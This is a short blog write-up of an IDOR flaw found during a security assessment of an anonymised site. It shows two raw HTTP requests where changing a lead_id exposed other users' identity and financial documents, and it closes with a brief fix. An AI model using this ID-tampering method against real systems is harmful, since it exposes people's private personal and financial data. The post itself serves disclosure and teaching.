IDOR leads to compromise PI (Personal information)data
Hi friends,
I am writing my first blog on Insecure Direct Object Reference (IDOR). What an interesting topic to write about indeed! I found this vulnerability during a security assessment. I will try to explain, how I found Personal information using IDOR like Aadhar card, Pan card, Bank statement, Bank passbook, Salary slip, Cancelled cheque etc.
What is IDOR ?
Insecure direct object reference is a type of access control vulnerability. It arises when certain application uses user input to access object directly. Hence attacker can also bypass authorization and access resource in the system directly.
How I found an IDOR on Target.com website
let’s assume the website name as target.com.(I can’t reveal the name for obvious reasons). Initially I made a long list of tests to perform on the website and IDOR was on top of that. You can call it as luck that I found it on first go. The application had Preview application functionality and when I clicked on that button, it was observed that the application was serving data to client according to lead_id which was being passed through request in form of plain text.
I came to the Preview application section which had the request like below:
Before manipulation
POST /details HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: https://target.com
Connection: close
Referer: https://target.com/dashboard
Cookie: xxxxxxxx
Upgrade-Insecure-Requests: 1
lead_id=12345
Tweaked it a little so as to check what more it can reveal :
After manipulation
POST /details HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: https://target.com
Connection: close
Referer: https://target.com/dashboard
Cookie: xxxxxxxx
Upgrade-Insecure-Requests: 1
lead_id=12332
I received successful response from server. Later, I was able to get any user’s account information by randomly changing the lead_id and was able to download PAN card, Aadhar card, Bank statement, Bank passbook, Salary slip, Address proof document, Loan details, agreement document, Cancelled cheque and so on of that particular id.
Sahi hai !! Apni to nikal padi !!
How to prevent
The best way to prevent IDOR is to perform an access control check to see if the user is authorized to access the requested object.
Special thanks to @rahul singh and kishore hariram for always motivating me to do better.
Happy hacking !!